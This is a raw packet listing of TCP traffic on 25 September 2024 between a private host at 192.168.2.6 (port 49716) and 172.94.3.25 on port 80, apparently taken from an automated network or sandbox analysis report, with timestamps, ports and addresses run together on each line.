                                        Sep 25, 2024 18:40:28.059127092 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059137106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059166908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059195995 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059201002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059242964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059272051 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059281111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059302092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059330940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059334040 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059361935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059393883 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.059890032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059938908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059963942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.059979916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.101635933 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.128725052 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133032084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133060932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133073092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133112907 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133126020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133137941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133151054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133192062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133299112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133342981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133353949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133383036 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133384943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133418083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133563042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133657932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133670092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133691072 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.133712053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133728027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.133745909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.134006023 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.134017944 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.134042025 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.134095907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.134107113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.134124994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.137061119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143563986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143589020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143599987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143611908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143620014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143626928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143647909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143676043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143687010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143695116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143699884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143711090 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.143722057 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143748999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.143997908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144058943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144071102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144092083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144124985 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144135952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144146919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144157887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144160986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144172907 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144197941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144222021 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144653082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144663095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144675016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144695997 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144782066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144792080 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144798994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144804955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144834995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144853115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144865036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144877911 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.144887924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.144915104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.145461082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145472050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145483017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145503998 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.145574093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145586014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145596981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145606995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.145608902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145632982 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.145737886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145747900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145759106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145771027 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.145772934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.145788908 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146051884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146337032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146368980 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146375895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146380901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146409035 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146481991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146492958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146506071 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146517038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146522999 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146549940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146605968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146616936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146629095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146645069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.146651030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.146677017 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.147335052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147345066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147356987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147377014 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.147424936 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147434950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147449017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147460938 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147469044 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.147501945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.147552967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147563934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147573948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147583961 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.147588015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.147614002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148200035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148235083 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148250103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148261070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148288965 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148341894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148351908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148363113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148376942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148391008 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148410082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148425102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148436069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148478031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148489952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.148515940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.148546934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.149175882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149187088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149199963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149218082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.149267912 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149279118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149290085 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149300098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.149303913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149332047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.149353981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149364948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149377108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149384022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.149389029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.149416924 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150120974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150131941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150145054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150160074 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150183916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150192976 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150203943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150216103 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150228024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150245905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150270939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150331020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150342941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150352955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150365114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.150403023 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.150417089 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.221651077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221729994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221740961 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221760988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221772909 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221785069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221798897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221820116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.221852064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.221924067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221935987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221946955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.221956968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666716099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666732073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666733980 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666749001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666766882 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666771889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666773081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666778088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666785955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666799068 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666799068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666810036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666821003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666827917 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666832924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666845083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666856050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666865110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666867971 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666879892 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.666889906 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.666909933 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667088032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667099953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667109966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667124987 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667154074 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667248011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667258978 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667269945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667283058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667295933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667304039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667309046 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667319059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667330027 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667331934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667342901 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667346954 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667370081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667404890 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667418003 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667431116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667438984 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667464972 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667774916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667787075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667798042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667810917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667826891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667850971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.667953968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667964935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667979956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.667993069 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668009996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668010950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668021917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668032885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668035030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668045998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668057919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668065071 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668070078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668081045 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668092012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668093920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668106079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668132067 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668462992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668473959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668484926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668495893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668507099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668512106 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668518066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668529034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668531895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668540955 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668546915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668582916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668606997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668618917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668629885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668651104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668787956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668798923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668809891 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668821096 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668832064 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668833017 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668859959 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668874979 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.668981075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.668992043 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669040918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669053078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669058084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669091940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669239044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669250011 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669260025 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669270992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669272900 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669281960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669292927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669318914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669342041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669378996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669392109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669401884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669425011 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669514894 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669549942 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669596910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669609070 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669620991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669632912 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669652939 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669677973 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.669748068 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669759035 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.669791937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670044899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670056105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670067072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670072079 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670078993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670089960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670099974 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670101881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670114040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670120001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670125008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670156002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670171022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670202971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670376062 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670387030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670397043 CEST8049716172.94.3.25192.168.2.6
